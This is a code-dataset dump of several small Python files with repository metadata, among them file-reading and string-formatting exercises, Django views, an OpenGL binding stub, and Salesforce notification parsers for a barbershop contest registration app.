| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5ef413f33aa8fca3d3259d7fc81852423f83e291
| 278
|
py
|
Python
|
Main/Test_Python_1.py
|
tamalbag117/Python_Practice
|
52d008682b9828043617b789a8ebf441048cd0de
|
[
"MIT"
] | null | null | null |
Main/Test_Python_1.py
|
tamalbag117/Python_Practice
|
52d008682b9828043617b789a8ebf441048cd0de
|
[
"MIT"
] | null | null | null |
Main/Test_Python_1.py
|
tamalbag117/Python_Practice
|
52d008682b9828043617b789a8ebf441048cd0de
|
[
"MIT"
] | null | null | null |
f1 = open("name.txt")
print(f1.tell())
print(f1.readline())
print(f1.tell())
print(f1.readline())
print(f1.tell())
print(f1.readline())
print(f1.tell())
print(f1.readline())
print(f1.tell())
print(f1.readline())
print(f1.tell())
print(f1.readline())
print(f1.tell())
f1.close()
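The same trace can be written as a loop; readline (unlike iterating the file object directly) keeps tell() usable on text files, and for a six-line name.txt this prints the same sequence of offsets and lines.
# Equivalent loop: print the byte offset before each line is read.
with open("name.txt") as f1:
    while True:
        print(f1.tell())
        line = f1.readline()
        if not line:  # empty string marks end of file
            break
        print(line)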
| 17.375
| 21
| 0.672662
| 45
| 278
| 4.155556
| 0.177778
| 0.486631
| 0.411765
| 0.513369
| 0.893048
| 0.893048
| 0.893048
| 0.893048
| 0.893048
| 0.893048
| 0
| 0.057471
| 0.061151
| 278
| 15
| 22
| 18.533333
| 0.659004
| 0
| 0
| 0.866667
| 0
| 0
| 0.028777
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.866667
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 11
|
6f04c5bc885f9b2a867972c4577b2d8121faad37
| 358
|
py
|
Python
|
OpenGLCffi/GL/EXT/NV/copy_image.py
|
cydenix/OpenGLCffi
|
c78f51ae5e6b655eb2ea98f072771cf69e2197f3
|
[
"MIT"
] | null | null | null |
OpenGLCffi/GL/EXT/NV/copy_image.py
|
cydenix/OpenGLCffi
|
c78f51ae5e6b655eb2ea98f072771cf69e2197f3
|
[
"MIT"
] | null | null | null |
OpenGLCffi/GL/EXT/NV/copy_image.py
|
cydenix/OpenGLCffi
|
c78f51ae5e6b655eb2ea98f072771cf69e2197f3
|
[
"MIT"
] | null | null | null |
from OpenGLCffi.GL import params
@params(api='gl', prms=['srcName', 'srcTarget', 'srcLevel', 'srcX', 'srcY', 'srcZ', 'dstName', 'dstTarget', 'dstLevel', 'dstX', 'dstY', 'dstZ', 'width', 'height', 'depth'])
def glCopyImageSubDataNV(srcName, srcTarget, srcLevel, srcX, srcY, srcZ, dstName, dstTarget, dstLevel, dstX, dstY, dstZ, width, height, depth):
pass
| 51.142857
| 172
| 0.687151
| 42
| 358
| 5.857143
| 0.595238
| 0.130081
| 0.195122
| 0.227642
| 0.715447
| 0.715447
| 0.715447
| 0.715447
| 0.715447
| 0.715447
| 0
| 0
| 0.111732
| 358
| 6
| 173
| 59.666667
| 0.773585
| 0
| 0
| 0
| 0
| 0
| 0.252809
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0.25
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
6f4573f0f4d72bc0f74a21e2bd725440effc6160
| 557
|
py
|
Python
|
src/Strings/example3.py
|
ogycode/PythonFromZero
|
5d1e3967c7a1ddc53fd6b5551c4154bb601f351a
|
[
"Apache-2.0"
] | null | null | null |
src/Strings/example3.py
|
ogycode/PythonFromZero
|
5d1e3967c7a1ddc53fd6b5551c4154bb601f351a
|
[
"Apache-2.0"
] | null | null | null |
src/Strings/example3.py
|
ogycode/PythonFromZero
|
5d1e3967c7a1ddc53fd6b5551c4154bb601f351a
|
[
"Apache-2.0"
] | 1
|
2021-02-27T06:51:05.000Z
|
2021-02-27T06:51:05.000Z
|
print("Strings, (c) Verloka Vadim 2018\n\n\n")
S1 = "Hello, {0}, how are you{1}"
print(S1.format("Vadim", "?"))
print("{:<20}".format("left"))
print("{:>20}".format("right"))
print("{:^20}".format("right"))
print("{:*<20}".format("left"))
print("{:*>20}".format("right"))
print("{:*^20}".format("right"))
print("{:1<20}".format("left"))
print("{:1>20}".format("right"))
print("{:1^20}".format("right"))
print("int: {0:d}; hex: {0:x}; oct: {0:o}; bin: {0:b}".format(10076))
print("int: {0:d}; hex: {0:#x}; oct: {0:#o}; bin: {0:#b}".format(10076))
| 27.85
| 75
| 0.54219
| 89
| 557
| 3.393258
| 0.303371
| 0.238411
| 0.258278
| 0.357616
| 0.761589
| 0.761589
| 0.725166
| 0.60596
| 0.60596
| 0.60596
| 0
| 0.092702
| 0.089767
| 557
| 20
| 75
| 27.85
| 0.502959
| 0
| 0
| 0
| 0
| 0.142857
| 0.487455
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.928571
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
48a289a508c766bae8e7421dee702c66a0192461
| 229
|
py
|
Python
|
chapter-3/Rendering HTML/app/simple_app/views.py
|
PacktPublishing/Real-time-Django
|
07480a089fc0880d752d4ee5740ae6587de93aee
|
[
"MIT"
] | null | null | null |
chapter-3/Rendering HTML/app/simple_app/views.py
|
PacktPublishing/Real-time-Django
|
07480a089fc0880d752d4ee5740ae6587de93aee
|
[
"MIT"
] | null | null | null |
chapter-3/Rendering HTML/app/simple_app/views.py
|
PacktPublishing/Real-time-Django
|
07480a089fc0880d752d4ee5740ae6587de93aee
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
def index(request):
return render(request, 'index.html', {})
def bingo(request):
return render(request, 'bingo.html', {})
def bmi(request):
return render(request, 'bmi.html', {})
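A hedged sketch of the URLconf these views would typically be mounted from (routes are illustrative, not taken from the book's app):
# Hypothetical urls.py for simple_app.
from django.urls import path
from . import views

urlpatterns = [
    path('', views.index),
    path('bingo/', views.bingo),
    path('bmi/', views.bmi),
]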
| 22.9
| 44
| 0.681223
| 29
| 229
| 5.37931
| 0.413793
| 0.25
| 0.365385
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157205
| 229
| 10
| 45
| 22.9
| 0.80829
| 0
| 0
| 0
| 0
| 0
| 0.121739
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0
| 0.142857
| 0.428571
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
48ad224d6542afa788bbd90cec58b55c4848d133
| 21,997
|
py
|
Python
|
project/apps/salesforce/models.py
|
barberscore/barberscore-api
|
2aa9f8598c18c28ba1d4a294f76fd055619f803e
|
[
"BSD-2-Clause"
] | 13
|
2017-08-07T15:45:49.000Z
|
2019-07-03T13:58:50.000Z
|
project/apps/salesforce/models.py
|
barberscore/barberscore-api
|
2aa9f8598c18c28ba1d4a294f76fd055619f803e
|
[
"BSD-2-Clause"
] | 309
|
2017-07-14T02:34:12.000Z
|
2022-01-14T21:37:02.000Z
|
project/apps/salesforce/models.py
|
barberscore/barberscore-api
|
2aa9f8598c18c28ba1d4a294f76fd055619f803e
|
[
"BSD-2-Clause"
] | 5
|
2017-08-07T14:01:07.000Z
|
2019-06-24T19:44:55.000Z
|
import json
# Third-Party
from model_utils import Choices
from distutils.util import strtobool
# Local
from apps.bhs.models import Convention, Award, Chart, Group, Person
from apps.registration.models import Contest, Session, Assignment, Entry
class SfConvention:
def parse_sf_notification(n):
d = {}
# Created
if hasattr(n, 'sf_CreatedDate'):
d['created'] = n.sf_CreatedDate.cdata
# Modified
if hasattr(n, 'sf_LastModifiedDate'):
d['modified'] = n.sf_LastModifiedDate.cdata
# UUID
if hasattr(n, 'sf_BS_UUID__c'):
d['id'] = n.sf_BS_UUID__c.cdata
# Status
if hasattr(n, 'sf_BS_Status__c'):
d['status'] = int(float(n.sf_BS_Status__c.cdata))
# Name
if hasattr(n, 'sf_Name'):
d['name'] = str(n.sf_Name.cdata)
# District
if hasattr(n, 'sf_BS_District__c'):
d['district'] = int(float(n.sf_BS_District__c.cdata))
# Season
if hasattr(n, 'sf_BS_Season__c'):
season = int(float(n.sf_BS_Season__c.cdata))
d['season'] = season
# Panel
if hasattr(n, 'sf_BS_Panel__c'):
d['panel'] = int(float(n.sf_BS_Panel__c.cdata))
# Year
if hasattr(n, 'sf_Year__c'):
d['year'] = int(n.sf_Year__c.cdata)
# Open Date
if hasattr(n, 'sf_Open_Date__c'):
d['open_date'] = n.sf_Open_Date__c.cdata
# Close Date
if hasattr(n, 'sf_Close_Date__c'):
d['close_date'] = n.sf_Close_Date__c.cdata
# Start Date
if hasattr(n, 'sf_Start_Date__c'):
d['start_date'] = n.sf_Start_Date__c.cdata
# End Date
if hasattr(n, 'sf_End_Date__c'):
d['end_date'] = n.sf_End_Date__c.cdata
# Venue
if hasattr(n, 'sf_Venue__c'):
d['venue_name'] = n.sf_Venue__c.cdata
# Location
if hasattr(n, 'sf_Location__c'):
d['location'] = n.sf_Location__c.cdata
# Time Zone
if hasattr(n, 'sf_Time_Zone__c'):
d['timezone'] = n.sf_Time_Zone__c.cdata
# Description
d['description'] = n.sf_Description__c.cdata if hasattr(n, 'sf_Description__c') else ""
# Divisions
if hasattr(n, 'sf_BS_Division__c'):
d['divisions'] = n.sf_BS_Division__c.cdata
# Kinds
if hasattr(n, 'sf_BS_Kind__c'):
d['kinds'] = n.sf_BS_Kind__c.cdata
# Return parsed dict
return d
class SfAward:
def parse_sf_notification(n):
d = {}
# Created
if hasattr(n, 'sf_CreatedDate'):
d['created'] = n.sf_CreatedDate.cdata
# Modified
if hasattr(n, 'sf_LastModifiedDate'):
d['modified'] = n.sf_LastModifiedDate.cdata
# UUID
if hasattr(n, 'sf_BS_UUID__c'):
d['id'] = n.sf_BS_UUID__c.cdata
# Name
if hasattr(n, 'sf_Name'):
d['name'] = n.sf_Name.cdata
# Status
if hasattr(n, 'sf_BS_Status__c'):
d['status'] = int(float(n.sf_BS_Status__c.cdata))
# Kind
if hasattr(n, 'sf_BS_Kind__c'):
d['kind'] = int(float(n.sf_BS_Kind__c.cdata))
# Gender
d['gender'] = int(float(n.sf_BS_Classification__c.cdata)) if hasattr(n, 'sf_BS_Classification__c') else None
# Level
if hasattr(n, 'sf_BS_Level__c'):
d['level'] = int(float(n.sf_BS_Level__c.cdata))
# Season
if hasattr(n, 'sf_BS_Season__c'):
d['season'] = int(float(n.sf_BS_Season__c.cdata))
# District
if hasattr(n, 'sf_BS_District__c'):
d['district'] = int(float(n.sf_BS_District__c.cdata))
# Divisions
d['division'] = int(float(n.sf_BS_Division__c.cdata)) if hasattr(n, 'sf_BS_Division__c') else None
# Is Single
if hasattr(n, 'sf_is_single__c'):
d['is_single'] = bool(strtobool(n.sf_is_single__c.cdata))
# Threshold
d['threshold'] = float(n.sf_Threshold__c.cdata) if hasattr(n, 'sf_Threshold__c') else None
# Minimum
d['minimum'] = float(n.sf_Minimum__c.cdata) if hasattr(n, 'sf_Minimum__c') else None
# advance
d['advance'] = float(n.sf_Advance__c.cdata) if hasattr(n, 'sf_Advance__c') else None
# spots
d['spots'] = int(float(n.sf_Spots__c.cdata)) if hasattr(n, 'sf_Spots__c') else None
# Description
d['description'] = n.sf_Description__c.cdata if hasattr(n, 'sf_Description__c') else ""
# Notes
d['notes'] = n.sf_Notes__c.cdata if hasattr(n, 'sf_Notes__c') else ""
# Age
d['age'] = int(float(n.sf_BS_Age__c.cdata)) if hasattr(n, 'sf_BS_Age__c') else None
# Is Novice
if hasattr(n, 'sf_is_novice__c'):
d['is_novice'] = bool(strtobool(n.sf_is_novice__c.cdata))
# Size
d['size'] = int(float(n.sf_BS_Size__c.cdata)) if hasattr(n, 'sf_BS_Size__c') else None
# Size Range
d['size_range'] = n.sf_Size_Range__c.cdata if hasattr(n, 'sf_Size_Range__c') else None
# Scope
d['scope'] = int(float(n.sf_BS_Scope__c.cdata)) if hasattr(n, 'sf_BS_Scope__c') else None
# Scope Range
d['scope_range'] = n.sf_Scope_Range__c.cdata if hasattr(n, 'sf_Scope_Range__c') else None
# Tree Sort
d['tree_sort'] = int(float(n.sf_Tree_Sort__c.cdata)) if hasattr(n, 'sf_Tree_Sort__c') else None
# Return parsed dict
return d
class SfChart:
def parse_sf_notification(n):
d = {}
# Created
if hasattr(n, 'sf_CreatedDate'):
d['created'] = n.sf_CreatedDate.cdata
# Modified
if hasattr(n, 'sf_LastModifiedDate'):
d['modified'] = n.sf_LastModifiedDate.cdata
# UUID
if hasattr(n, 'sf_BS_UUID__c'):
d['id'] = n.sf_BS_UUID__c.cdata
# Status
if hasattr(n, 'sf_BS_Status__c'):
d['status'] = int(float(n.sf_BS_Status__c.cdata))
# Name
if hasattr(n, 'sf_Name'):
d['title'] = n.sf_Name.cdata
# Arrangers
if hasattr(n, 'sf_Arrangers__c'):
d['arrangers'] = n.sf_Arrangers__c.cdata
# Composer
d['composers'] = n.sf_Composers__c.cdata if hasattr(n, 'sf_Composers__c') else ""
# Lyricist
d['lyricists'] = n.sf_Lyricists__c.cdata if hasattr(n, 'sf_Lyricists__c') else ""
# Holders
d['holders'] = n.sf_Holders__c.cdata if hasattr(n, 'sf_Holders__c') else ""
# Description
d['description'] = n.sf_Description__c.cdata if hasattr(n, 'sf_Description__c') else ""
# Notes
d['notes'] = n.sf_Notes__c.cdata if hasattr(n, 'sf_Notes__c') else ""
# Return parsed dict
return d
class SfGroup:
def parse_sf_notification(n):
d = {}
# Created
if hasattr(n, 'sf_CreatedDate'):
d['created'] = n.sf_CreatedDate.cdata
# Modified
if hasattr(n, 'sf_LastModifiedDate'):
d['modified'] = n.sf_LastModifiedDate.cdata
# UUID
if hasattr(n, 'sf_BS_UUID__c'):
d['id'] = n.sf_BS_UUID__c.cdata
# Name
if hasattr(n, 'sf_Name'):
d['name'] = n.sf_Name.cdata
# Status
if hasattr(n, 'sf_BS_Status__c'):
d['status'] = int(float(n.sf_BS_Status__c.cdata))
# Kind
if hasattr(n, 'sf_BS_Kind__c'):
d['kind'] = int(float(n.sf_BS_Kind__c.cdata))
# Gender
if hasattr(n, 'sf_BS_Classification__c'):
d['gender'] = int(float(n.sf_BS_Classification__c.cdata))
# District
if hasattr(n, 'sf_BS_District__c'):
d['district'] = int(float(n.sf_BS_District__c.cdata))
# Divisions
d['division'] = int(float(n.sf_BS_Division__c.cdata)) if hasattr(n, 'sf_BS_Division__c') else None
# bhs_id
if hasattr(n, 'sf_cfg_Member_Id__c') and n.sf_cfg_Member_Id__c.cdata.isdigit():
# Is a Quartet
d['bhs_id'] = int(n.sf_cfg_Member_Id__c.cdata)
elif hasattr(n, 'sf_cfg_Member_Id__c'):
# Is a Chorus
# code
d['code'] = n.sf_cfg_Member_Id__c.cdata
# Return parsed dict
return d
class SfPerson:
def parse_sf_notification(n):
d = {}
# Created
if hasattr(n, 'sf_CreatedDate'):
d['created'] = n.sf_CreatedDate.cdata
# Modified
if hasattr(n, 'sf_LastModifiedDate'):
d['modified'] = n.sf_LastModifiedDate.cdata
# UUID
if hasattr(n, 'sf_BS_UUID__c'):
d['id'] = n.sf_BS_UUID__c.cdata
# Status
if hasattr(n, 'sf_BS_Status__c'):
d['status'] = int(float(n.sf_BS_Status__c.cdata))
# Name
if hasattr(n, 'sf_FirstName') and hasattr(n, 'sf_LastName'):
d['name'] = n.sf_FirstName.cdata + " " + n.sf_LastName.cdata
# First Name
d['first_name'] = n.sf_FirstName.cdata if hasattr(n, 'sf_FirstName') else ""
# Last Name
d['last_name'] = n.sf_LastName.cdata if hasattr(n, 'sf_LastName') else ""
# part
d['part'] = int(float(n.sf_BS_VoicePart__c.cdata)) if hasattr(n, 'sf_BS_VoicePart__c') else None
# Gender
d['gender'] = int(float(n.sf_BS_Gender__c.cdata)) if hasattr(n, 'sf_BS_Gender__c') else None
# Email
d['email'] = n.sf_npe01__HomeEmail__c.cdata if hasattr(n, 'sf_npe01__HomeEmail__c') else ""
# Home Phone
d['home_phone'] = n.sf_HomePhone.cdata if hasattr(n, 'sf_HomePhone') else ""
# Cell Phone
d['cell_phone'] = n.sf_MobilePhone.cdata if hasattr(n, 'sf_MobilePhone') else ""
# BHS ID
d['bhs_id'] = int(n.sf_cfg_Member_Number__c.cdata) if hasattr(n, 'sf_cfg_Member_Number__c') else None
# Return parsed dict
return d
class SfSession:
def parse_sf_notification(n):
d = {}
# Created
if hasattr(n, 'sf_CreatedDate'):
d['created'] = n.sf_CreatedDate.cdata
# Modified
if hasattr(n, 'sf_LastModifiedDate'):
d['modified'] = n.sf_LastModifiedDate.cdata
# UUID
if hasattr(n, 'sf_BS_UUID__c'):
d['id'] = n.sf_BS_UUID__c.cdata
# Status
if hasattr(n, 'sf_BS_Status__c'):
d['status'] = int(float(n.sf_BS_Status__c.cdata))
# Kind
if hasattr(n, 'sf_BS_Kind__c'):
d['kind'] = int(float(n.sf_BS_Kind__c.cdata))
# Num Rounds
if hasattr(n, 'sf_Num_rounds__c'):
d['num_rounds'] = int(float(n.sf_Num_rounds__c.cdata))
# Is Invitational
if hasattr(n, 'sf_is_invitational__c'):
d['is_invitational'] = bool(strtobool(n.sf_is_invitational__c.cdata))
# Description
d['description'] = n.sf_Description__c.cdata if hasattr(n, 'sf_Description__c') else ""
# Notes
d['notes'] = n.sf_Notes__c.cdata if hasattr(n, 'sf_Notes__c') else ""
# Footnotes
d['footnotes'] = n.sf_Footnotes__c.cdata if hasattr(n, 'sf_Footnotes__c') else ""
if hasattr(n, 'sf_BS_Convention_UUID__c'):
d['convention_id'] = n.sf_BS_Convention_UUID__c.cdata
# Name
if hasattr(n, 'sf_Name'):
d['name'] = n.sf_Name.cdata
# District
if hasattr(n, 'sf_BS_District__c'):
d['district'] = int(float(n.sf_BS_District__c.cdata))
# Season
if hasattr(n, 'sf_BS_Season__c'):
d['season'] = int(float(n.sf_BS_Season__c.cdata))
# Panel
if hasattr(n, 'sf_BS_Panel__c'):
d['panel'] = int(float(n.sf_BS_Panel__c.cdata))
# Year
if hasattr(n, 'sf_Year__c'):
d['year'] = int(n.sf_Year__c.cdata)
# Open Date
if hasattr(n, 'sf_Open_Date__c'):
d['open_date'] = n.sf_Open_Date__c.cdata
# Close Date
if hasattr(n, 'sf_Close_Date__c'):
d['close_date'] = n.sf_Close_Date__c.cdata
# Start Date
if hasattr(n, 'sf_Start_Date__c'):
d['start_date'] = n.sf_Start_Date__c.cdata
# End Date
if hasattr(n, 'sf_End_Date__c'):
d['end_date'] = n.sf_End_Date__c.cdata
# Venue
if hasattr(n, 'sf_Venue__c'):
d['venue_name'] = n.sf_Venue__c.cdata
# Location
if hasattr(n, 'sf_Location__c'):
d['location'] = n.sf_Location__c.cdata
# Time Zone
if hasattr(n, 'sf_Time_Zone__c'):
d['timezone'] = n.sf_Time_Zone__c.cdata
# Divisions
if hasattr(n, 'sf_BS_Division__c'):
d['divisions'] = n.sf_BS_Division__c.cdata
# Return parsed dict
return d
class SfContest:
def parse_sf_notification(n):
d = {}
# Created
if hasattr(n, 'sf_CreatedDate'):
d['created'] = n.sf_CreatedDate.cdata
# Modified
if hasattr(n, 'sf_LastModifiedDate'):
d['modified'] = n.sf_LastModifiedDate.cdata
# UUID
if hasattr(n, 'sf_BS_UUID__c'):
d['id'] = n.sf_BS_UUID__c.cdata
# Award ID
if hasattr(n, 'sf_BS_Award_UUID__c'):
d['award_id'] = n.sf_BS_Award_UUID__c.cdata
# Name
if hasattr(n, 'sf_Name'):
d['name'] = n.sf_Name.cdata
# Kind
if hasattr(n, 'sf_BS_Kind__c'):
d['kind'] = int(float(n.sf_BS_Kind__c.cdata))
# Gender
d['gender'] = int(float(n.sf_BS_Classification__c.cdata)) if hasattr(n, 'sf_BS_Classification__c') else None
# Level
if hasattr(n, 'sf_BS_Level__c'):
d['level'] = int(float(n.sf_BS_Level__c.cdata))
# Season
if hasattr(n, 'sf_BS_Season__c'):
d['season'] = int(float(n.sf_BS_Season__c.cdata))
# Description
d['description'] = n.sf_Description__c.cdata if hasattr(n, 'sf_Description__c') else ""
# District
if hasattr(n, 'sf_BS_District__c'):
d['district'] = int(float(n.sf_BS_District__c.cdata))
# Divisions
d['division'] = int(float(n.sf_BS_Division__c.cdata)) if hasattr(n, 'sf_BS_Division__c') else None
# Age
d['age'] = int(float(n.sf_BS_Age__c.cdata)) if hasattr(n, 'sf_BS_Age__c') else None
# Is Novice
if hasattr(n, 'sf_is_novice__c'):
d['is_novice'] = bool(strtobool(n.sf_is_novice__c.cdata))
# Is Single
if hasattr(n, 'sf_is_single__c'):
d['is_single'] = bool(strtobool(n.sf_is_single__c.cdata))
# Size
d['size'] = int(float(n.sf_BS_Size__c.cdata)) if hasattr(n, 'sf_BS_Size__c') else None
# Size Range
d['size_range'] = n.sf_Size_Range__c.cdata if hasattr(n, 'sf_Size_Range__c') else None
# Scope
d['scope'] = int(float(n.sf_BS_Scope__c.cdata)) if hasattr(n, 'sf_BS_Scope__c') else None
# Scope Range
d['scope_range'] = n.sf_Scope_Range__c.cdata if hasattr(n, 'sf_Scope_Range__c') else None
# Tree Sort
d['tree_sort'] = int(float(n.sf_Tree_Sort__c.cdata)) if hasattr(n, 'sf_Tree_Sort__c') else None
# Session ID
if hasattr(n, 'sf_BS_Session_UUID__c'):
d['session_id'] = n.sf_BS_Session_UUID__c.cdata
# Return parsed dict
return d
class SfAssignment:
def parse_sf_notification(n):
d = {}
# Created
if hasattr(n, 'sf_CreatedDate'):
d['created'] = n.sf_CreatedDate.cdata
# Modified
if hasattr(n, 'sf_LastModifiedDate'):
d['modified'] = n.sf_LastModifiedDate.cdata
# UUID
if hasattr(n, 'sf_BS_UUID__c'):
d['id'] = n.sf_BS_UUID__c.cdata
# Kind
if hasattr(n, 'sf_BS_Type__c'):
d['kind'] = int(float(n.sf_BS_Type__c.cdata))
# Category
if hasattr(n, 'sf_BS_Category__c'):
d['category'] = int(float(n.sf_BS_Category__c.cdata))
# Person ID
if hasattr(n, 'sf_BS_Contact_UUID__c'):
d['person_id'] = n.sf_BS_Contact_UUID__c.cdata
# Name
d['name'] = n.sf_Name__c.cdata if hasattr(n, 'sf_Name__c') else None
# First Name
d['first_name'] = n.sf_FirstName__c.cdata if hasattr(n, 'sf_FirstName__c') else None
# Last Name
d['last_name'] = n.sf_LastName__c.cdata if hasattr(n, 'sf_LastName__c') else None
# District
if hasattr(n, 'sf_BS_District__c'):
d['district'] = int(float(n.sf_BS_District__c.cdata))
# Area
if hasattr(n, 'sf_Area__c'):
d['area'] = n.sf_Area__c.cdata
# Email
d['email'] = n.sf_HomeEmail__c.cdata if hasattr(n, 'sf_HomeEmail__c') else None
# Cell Phone
d['cell_phone'] = n.sf_MobilePhone__c.cdata if hasattr(n, 'sf_MobilePhone__c') else None
# Airports
d['airports'] = n.sf_Airports__c.cdata if hasattr(n, 'sf_Airports__c') else None
# BHS ID
d['bhs_id'] = int(n.sf_cfg_Member_Number__c.cdata) if hasattr(n, 'sf_cfg_Member_Number__c') else None
# Session ID
if hasattr(n, 'sf_BS_Session_UUID__c'):
d['session_id'] = n.sf_BS_Session_UUID__c.cdata
# Return parsed dict
return d
class SfEntry:
def parse_sf_notification(n):
d = {}
# Created
if hasattr(n, 'sf_CreatedDate'):
d['created'] = n.sf_CreatedDate.cdata
# Modified
if hasattr(n, 'sf_LastModifiedDate'):
d['modified'] = n.sf_LastModifiedDate.cdata
# UUID
if hasattr(n, 'sf_BS_UUID__c'):
d['id'] = n.sf_BS_UUID__c.cdata
# Status
if hasattr(n, 'sf_BS_Status__c'):
d['status'] = int(float(n.sf_BS_Status__c.cdata))
# Is Evaluation
if hasattr(n, 'sf_is_evaluation__c'):
d['is_evaluation'] = bool(strtobool(n.sf_is_evaluation__c.cdata))
# Is Private
if hasattr(n, 'sf_is_private__c'):
d['is_private'] = bool(strtobool(n.sf_is_private__c.cdata))
# Is MT
if hasattr(n, 'sf_is_mt__c'):
d['is_mt'] = bool(strtobool(n.sf_is_mt__c.cdata))
# Is Senior
if hasattr(n, 'sf_is_senior__c'):
d['is_senior'] = bool(strtobool(n.sf_is_senior__c.cdata))
# Is Youth
if hasattr(n, 'sf_is_youth__c'):
d['is_youth'] = bool(strtobool(n.sf_is_youth__c.cdata))
# Draw
d['draw'] = int(float(n.sf_Draw_Order__c.cdata)) if hasattr(n, 'sf_Draw_Order__c') else None
# Prelim
d['prelim'] = float(n.sf_Prelim__c.cdata) if hasattr(n, 'sf_Prelim__c') else None
# Base
d['base'] = float(n.sf_Base__c.cdata) if hasattr(n, 'sf_Base__c') else None
# Participants
d['participants'] = n.sf_Participants__c.cdata if hasattr(n, 'sf_Participants__c') else ""
# POS
d['pos'] = int(float(n.sf_Persons_On_Stage__c.cdata)) if hasattr(n, 'sf_Persons_On_Stage__c') else None
# Area
if hasattr(n, 'sf_Organization__c'):
d['area'] = n.sf_Organization__c.cdata
# Chapters
d['chapters'] = n.sf_Chapters__c.cdata if hasattr(n, 'sf_Chapters__c') else ""
# Description
d['description'] = n.sf_Description__c.cdata if hasattr(n, 'sf_Description__c') else ""
# Notes
d['notes'] = n.sf_Notes__c.cdata if hasattr(n, 'sf_Notes__c') else ""
# Group ID
if hasattr(n, 'sf_BS_Account_UUID__c'):
d['group_id'] = n.sf_BS_Account_UUID__c.cdata
# Name
if hasattr(n, 'sf_Name'):
d['name'] = n.sf_Name.cdata
# Kind
if hasattr(n, 'sf_BS_Kind__c'):
d['kind'] = int(float(n.sf_BS_Kind__c.cdata))
# Gender
if hasattr(n, 'sf_BS_Classification__c'):
d['gender'] = int(float(n.sf_BS_Classification__c.cdata))
# District
if hasattr(n, 'sf_BS_District__c'):
d['district'] = int(float(n.sf_BS_District__c.cdata))
# Divisions
d['division'] = int(float(n.sf_BS_Division__c.cdata)) if hasattr(n, 'sf_BS_Division__c') else None
if hasattr(n, 'sf_cfg_Member_Id__c'):
if n.sf_cfg_Member_Id__c.cdata.isdigit():
# BHS ID
d['bhs_id'] = int(n.sf_cfg_Member_Id__c.cdata)
else:
# code
d['code'] = n.sf_cfg_Member_Id__c.cdata
# Session ID
if hasattr(n, 'sf_BS_Session_UUID__c'):
d['session_id'] = n.sf_BS_Session_UUID__c.cdata
# Return parsed dict
return d
class SfEntryContest:
def parse_sf_notification(n):
d = {}
# Contest UUID
if hasattr(n, 'sf_BS_Contest_UUID__c'):
d['contest_id'] = n.sf_BS_Contest_UUID__c.cdata
# Entry UUID
if hasattr(n, 'sf_BS_Entry_UUID__c'):
d['entry_id'] = n.sf_BS_Entry_UUID__c.cdata
# Is Deleted
if hasattr(n, 'sf_IsDeleted'):
d['deleted'] = bool(strtobool(n.sf_IsDeleted.cdata))
# Return parsed dict
return d
class SfGroupChart:
def parse_sf_notification(n):
d = {}
# Group UUID
if hasattr(n, 'sf_BS_Account_UUID__c'):
d['group_id'] = n.sf_BS_Account_UUID__c.cdata
# Chart UUID
if hasattr(n, 'sf_BS_Chart_UUID__c'):
d['chart_id'] = n.sf_BS_Chart_UUID__c.cdata
# Is Deleted
if hasattr(n, 'sf_IsDeleted'):
d['deleted'] = bool(strtobool(n.sf_IsDeleted.cdata))
# Return parsed dict
return d
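Every parser above repeats one access pattern: guard with hasattr, read .cdata, optionally cast. A hedged helper sketch (names are illustrative, not part of the app) that would express it once:
# Illustrative refactor of the hasattr/.cdata/cast pattern used throughout.
def _cdata(n, field, cast=None, default=None):
    if not hasattr(n, field):
        return default
    value = getattr(n, field).cdata
    return cast(value) if cast is not None else value

# e.g. d['status'] = _cdata(n, 'sf_BS_Status__c', cast=lambda v: int(float(v)))
# e.g. d['notes'] = _cdata(n, 'sf_Notes__c', default="")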
| 29.887228
| 116
| 0.576169
| 3,155
| 21,997
| 3.622187
| 0.05103
| 0.092142
| 0.153133
| 0.181659
| 0.860606
| 0.807578
| 0.735212
| 0.721124
| 0.688134
| 0.677721
| 0
| 0.000258
| 0.295677
| 21,997
| 735
| 117
| 29.927891
| 0.737365
| 0.074919
| 0
| 0.720588
| 0
| 0
| 0.1926
| 0.018551
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032353
| false
| 0
| 0.014706
| 0
| 0.111765
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
48d98084301ed528e1a9c6542931e9937af6b22e
| 191
|
py
|
Python
|
gacha_elper/error/__init__.py
|
